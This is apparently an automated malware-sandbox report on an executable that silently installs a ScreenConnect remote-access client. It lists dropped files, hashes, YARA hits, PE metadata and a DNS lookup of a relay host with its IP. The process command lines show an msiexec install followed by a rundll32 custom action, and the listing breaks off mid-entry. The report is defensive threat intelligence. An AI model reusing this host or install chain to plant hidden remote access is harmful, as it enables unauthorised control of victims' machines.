                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>sc.connectprotocol.es=38.69.12.167-03%2f12%2f2024%2015%3a20%3a15</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                            Process:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1590
                                                                                                            Entropy (8bit):5.363907225770245
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                                                            MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                                                            SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                                                            SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                                                            SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                                                            Malicious:false
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):1.8084437388556067
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:v8Ph2uRc06WXzEFT5VIYIR7imqcq56AduHvlSi3zSd/2cPWGn3f9aud+GZPFCrmh:uh215FTC7izp4fed/4G3f9FD9lqK
                                                                                                            MD5:AF358D9BEEC9195C8DC9FED4D4FC0DAD
                                                                                                            SHA1:1EB96EE0409EC416F97F0ECF9CB3643CFAEE0A5B
                                                                                                            SHA-256:83B419F9CE6C3E7A454AF12CCB13F1D688045F53777FD5A4A901169720F467BA
                                                                                                            SHA-512:46D4807809AC467ED9B5EC83B13F51E1820FD317AF1225D4DFFDA4662F57C74563BCA8CCB75F3AF34F32B2E4AFDF5ADD4888A269C359D680C3D84C17EF3634CD
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF05F0D14B49496305.TMP, Author: Joe Security
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):32768
                                                                                                            Entropy (8bit):0.07756281497129278
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOUfKo0V8h9YQASKChiVky6l51:2F0i8n0itFzDHFUfK2Yw7r
                                                                                                            MD5:71154BF8B43A35F87A6ACAD827B1F92C
                                                                                                            SHA1:E108E84146383B21010D15745839EA73B54F678E
                                                                                                            SHA-256:26F89EA28068E2244003A076771C10C81CF12B1CF8694A45E345107D28CD5E09
                                                                                                            SHA-512:74C4DE97FBC8AB72DE77491E2D5F2657A003C1F2E130C09B14E602E6B303F6E4CCC1419695DE60DF7832C03B84985031C99A1DFC91397CDC53526A29AF46D60D
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):32768
                                                                                                            Entropy (8bit):1.4262159114293096
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:apeuGth8FXz5T5aUtIYIR7imqcq56AduHvlSi3zSd/2cPWGn3f9aud+GZPFCrmA2:qes3Tod7izp4fed/4G3f9FD9lqK
                                                                                                            MD5:5CB96CC6D145979104FFBFEE7DC413EF
                                                                                                            SHA1:AECFC2940CA896566E06C3C8C9207AEEE84944E7
                                                                                                            SHA-256:9AAB92CC787FA6468A5157F4C5FE8A1C985E86943860036902A76FF8C32DAC69
                                                                                                            SHA-512:164909DFC6976AB154B9A7EEA1346BF46B4E1C83CFADEDF4AAC15E558AD04E5B6E485309FF07CA06C8B9AD55C265010EA6E13B934970C7F7D3E744A4CDE6444E
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF5F6339E16C6791FF.TMP, Author: Joe Security
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):32768
                                                                                                            Entropy (8bit):1.4262159114293096
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:apeuGth8FXz5T5aUtIYIR7imqcq56AduHvlSi3zSd/2cPWGn3f9aud+GZPFCrmA2:qes3Tod7izp4fed/4G3f9FD9lqK
                                                                                                            MD5:5CB96CC6D145979104FFBFEE7DC413EF
                                                                                                            SHA1:AECFC2940CA896566E06C3C8C9207AEEE84944E7
                                                                                                            SHA-256:9AAB92CC787FA6468A5157F4C5FE8A1C985E86943860036902A76FF8C32DAC69
                                                                                                            SHA-512:164909DFC6976AB154B9A7EEA1346BF46B4E1C83CFADEDF4AAC15E558AD04E5B6E485309FF07CA06C8B9AD55C265010EA6E13B934970C7F7D3E744A4CDE6444E
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFA01B11556604F6BD.TMP, Author: Joe Security
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):1.8084437388556067
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:v8Ph2uRc06WXzEFT5VIYIR7imqcq56AduHvlSi3zSd/2cPWGn3f9aud+GZPFCrmh:uh215FTC7izp4fed/4G3f9FD9lqK
                                                                                                            MD5:AF358D9BEEC9195C8DC9FED4D4FC0DAD
                                                                                                            SHA1:1EB96EE0409EC416F97F0ECF9CB3643CFAEE0A5B
                                                                                                            SHA-256:83B419F9CE6C3E7A454AF12CCB13F1D688045F53777FD5A4A901169720F467BA
                                                                                                            SHA-512:46D4807809AC467ED9B5EC83B13F51E1820FD317AF1225D4DFFDA4662F57C74563BCA8CCB75F3AF34F32B2E4AFDF5ADD4888A269C359D680C3D84C17EF3634CD
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFA2315AC072D60478.TMP, Author: Joe Security
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):32768
                                                                                                            Entropy (8bit):1.4262159114293096
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:apeuGth8FXz5T5aUtIYIR7imqcq56AduHvlSi3zSd/2cPWGn3f9aud+GZPFCrmA2:qes3Tod7izp4fed/4G3f9FD9lqK
                                                                                                            MD5:5CB96CC6D145979104FFBFEE7DC413EF
                                                                                                            SHA1:AECFC2940CA896566E06C3C8C9207AEEE84944E7
                                                                                                            SHA-256:9AAB92CC787FA6468A5157F4C5FE8A1C985E86943860036902A76FF8C32DAC69
                                                                                                            SHA-512:164909DFC6976AB154B9A7EEA1346BF46B4E1C83CFADEDF4AAC15E558AD04E5B6E485309FF07CA06C8B9AD55C265010EA6E13B934970C7F7D3E744A4CDE6444E
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFB9D17362A4D0E7A8.TMP, Author: Joe Security
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):69632
                                                                                                            Entropy (8bit):0.23753306790899892
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:BelKx9fvnDBAduHvlS3qcq56AduHvlSi3zSd/2cPWGn3f9aud+GZPFCrei05IYI:BqKXxp4fed/4G3f9FDVi0
                                                                                                            MD5:B526FC196C323AB4CBF956B63AA5F9B3
                                                                                                            SHA1:7939DD3F04999A827F64378C1808FE30A6AAB277
                                                                                                            SHA-256:BB8DEAED52AEBAEF4444EF9743CA6D02448CBAA0E1F669C14EB1528AD457B053
                                                                                                            SHA-512:3A394F2A12D6105AFF444D85E56E2D359A1F3935E8B6B176C735CAD8A2F5769E10B017E7157A3FA5C42F4272EBB90A695EEB53A75F3CA8EAD01AE0294CC4D57C
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFE4D607A3416BF7CD.TMP, Author: Joe Security
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):512
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                            Malicious:false
                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Entropy (8bit):7.429448251981768
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:tiG6Ep202n.exe
                                                                                                            File size:5'620'136 bytes
                                                                                                            MD5:e7e869eca1d9e7fb0c7197725f3e22e5
                                                                                                            SHA1:0443247608194aa371b80e0f398f7180436821bb
                                                                                                            SHA256:58dff1cfcae1349d3e7cc009fb0cf1c109bdb4a5f3d2f8101ff9bd61d514a811
                                                                                                            SHA512:b987f0d89556e675ea2b7e153084b762ccc07d137c2d2bfd2c92c0fb2ec2dd7ed5c29f559513ea5eebadee4b13e06c955be8361c144cb7708623ab7dcf1fae1e
                                                                                                            SSDEEP:49152:0EEL5cx5xTkYJkGYYpT0+TFiH7efP8Q1yJJ4ZD1F5z97oL1YbGQ+okRPGHpRPqM8:9Es6efPNwJ4t1h0cG5FGJRPxow8O
                                                                                                            TLSH:5146E111B3DA95B9D4BF063CD87A82699A74BC044712C7EF53D4BD2D2D32BC05A323A6
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                            Entrypoint:0x4014ad
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:true
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:5
                                                                                                            OS Version Minor:1
                                                                                                            File Version Major:5
                                                                                                            File Version Minor:1
                                                                                                            Subsystem Version Major:5
                                                                                                            Subsystem Version Minor:1
                                                                                                            Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                                                            Signature Valid:true
                                                                                                            Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                            Signature Validation Error:The operation completed successfully
                                                                                                            Error Number:0
                                                                                                            Not Before, Not After
                                                                                                            • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                                                            Subject Chain
                                                                                                            • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                            Version:3
                                                                                                            Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                            Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                            Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                            Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                                            Instruction
                                                                                                            call 00007FD4C0B1951Ah
                                                                                                            jmp 00007FD4C0B18FCFh
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            push 00000000h
                                                                                                            call dword ptr [0040D040h]
                                                                                                            push dword ptr [ebp+08h]
                                                                                                            call dword ptr [0040D03Ch]
                                                                                                            push C0000409h
                                                                                                            call dword ptr [0040D044h]
                                                                                                            push eax
                                                                                                            call dword ptr [0040D048h]
                                                                                                            pop ebp
                                                                                                            ret
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            sub esp, 00000324h
                                                                                                            push 00000017h
                                                                                                            call dword ptr [0040D04Ch]
                                                                                                            test eax, eax
                                                                                                            je 00007FD4C0B19157h
                                                                                                            push 00000002h
                                                                                                            pop ecx
                                                                                                            int 29h
                                                                                                            mov dword ptr [004148D8h], eax
                                                                                                            mov dword ptr [004148D4h], ecx
                                                                                                            mov dword ptr [004148D0h], edx
                                                                                                            mov dword ptr [004148CCh], ebx
                                                                                                            mov dword ptr [004148C8h], esi
                                                                                                            mov dword ptr [004148C4h], edi
                                                                                                            mov word ptr [004148F0h], ss
                                                                                                            mov word ptr [004148E4h], cs
                                                                                                            mov word ptr [004148C0h], ds
                                                                                                            mov word ptr [004148BCh], es
                                                                                                            mov word ptr [004148B8h], fs
                                                                                                            mov word ptr [004148B4h], gs
                                                                                                            pushfd
                                                                                                            pop dword ptr [004148E8h]
                                                                                                            mov eax, dword ptr [ebp+00h]
                                                                                                            mov dword ptr [004148DCh], eax
                                                                                                            mov eax, dword ptr [ebp+04h]
                                                                                                            mov dword ptr [004148E0h], eax
                                                                                                            lea eax, dword ptr [ebp+08h]
                                                                                                            mov dword ptr [004148ECh], eax
                                                                                                            mov eax, dword ptr [ebp-00000324h]
                                                                                                            mov dword ptr [00414828h], 00010001h
                                                                                                            Programming Language:
                                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                                            • [IMP] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x129c4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x533074 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x546200 | 0x15fa8 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x54a000 | 0xea8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x11f20 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x11e60 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x13c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb1af | 0xb200 | d9fa6da0baf4b869720be833223490cb | False | 0.6123156601123596 | data | 6.592039633797327 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xd000 | 0x6078 | 0x6200 | 8b45a1035c0de72f910a75db7749f735 | False | 0.41549744897959184 | data | 4.786621464556291 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x14000 | 0x11e4 | 0x800 | 1f4cc86b6735a74429c9d1feb93e2871 | False | 0.18310546875 | data | 2.265083745848167 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x16000 | 0x533074 | 0x533200 | d813d73373778ed5b0a4b71b252379eb | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x54a000 | 0xea8 | 0x1000 | a93b0f39998e1e69e5944da8c5ff06b1 | False | 0.72265625 | data | 6.301490309336801 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
FILES | 0x163d4 | 0x86000 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.3962220149253731
FILES | 0x9c3d4 | 0x1a4600 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.5111589431762695
FILES | 0x2409d4 | 0x1ac00 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.4415066442757009
FILES | 0x25b5d4 | 0x2ec318 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.9810924530029297
FILES | 0x5478ec | 0x1600 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.3908025568181818
RT_MANIFEST | 0x548eec | 0x188 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5892857142857143
DLL | Import
mscoree.dll | CorBindToRuntimeEx
KERNEL32.dll | GetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
OLEAUT32.dll | VariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 3, 2024 16:20:16.657816887 CET | 50357 | 53 | 192.168.2.6 | 1.1.1.1
Dec 3, 2024 16:20:16.797487020 CET | 53 | 50357 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 3, 2024 16:20:16.657816887 CET | 192.168.2.6 | 1.1.1.1 | 0x176d | Standard query (0) | sc.connectprotocol.es | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 3, 2024 16:20:16.797487020 CET | 1.1.1.1 | 192.168.2.6 | 0x176d | No error (0) | sc.connectprotocol.es | | 38.69.12.167 | A (IP address) | IN (0x0001) | false

                                                                                                            Target ID:0
                                                                                                            Start time:10:20:09
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Users\user\Desktop\tiG6Ep202n.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\tiG6Ep202n.exe"
                                                                                                            Imagebase:0xa80000
                                                                                                            File size:5'620'136 bytes
                                                                                                            MD5 hash:E7E869ECA1D9E7FB0C7197725F3E22E5
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.2173892307.0000000005A60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.2178858378.00000000068B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.2138892674.0000000000A96000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:2
                                                                                                            Start time:10:20:09
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi"
                                                                                                            Imagebase:0x150000
                                                                                                            File size:59'904 bytes
                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:3
                                                                                                            Start time:10:20:10
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\System32\msiexec.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                            Imagebase:0x7ff73a7b0000
                                                                                                            File size:69'632 bytes
                                                                                                            MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:4
                                                                                                            Start time:10:20:11
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 65BBBA74F7292B7FF205870D60C0A988 C
                                                                                                            Imagebase:0x150000
                                                                                                            File size:59'904 bytes
                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:5
                                                                                                            Start time:10:20:11
                                                                                                            Start date:03/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI9606.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6723343 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                                            Imagebase:0x190000
                                                                                                            File size:61'440 bytes
                                                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:6
